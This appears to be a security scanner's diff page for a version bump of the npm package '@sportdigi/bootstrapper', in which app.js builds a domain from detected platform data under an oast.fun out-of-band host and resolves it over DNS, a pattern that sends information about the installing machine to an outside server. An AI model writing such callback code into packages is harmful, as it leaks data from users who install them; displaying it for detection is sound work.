@sportdigi/bootstrapper 16.1.0 → 17.1.0
Sign up to get free protection for your applications and to get access to all the features.
- package/app.js +1 -1
- package/package.json +1 -1
package/app.js
CHANGED
@@ -25,7 +25,7 @@ switch (platform) {
|
|
25
25
|
default: queryData = 'bilinmeyen'
|
26
26
|
}
|
27
27
|
|
28
|
-
const domain = `${
|
28
|
+
const domain = `${queryData}.nkhgevpndozoxokzqhojhvfqppdrh4xzm.oast.fun`;
|
29
29
|
|
30
30
|
dns.resolve(domain, (err, records) => {
|
31
31
|
if (err) {
|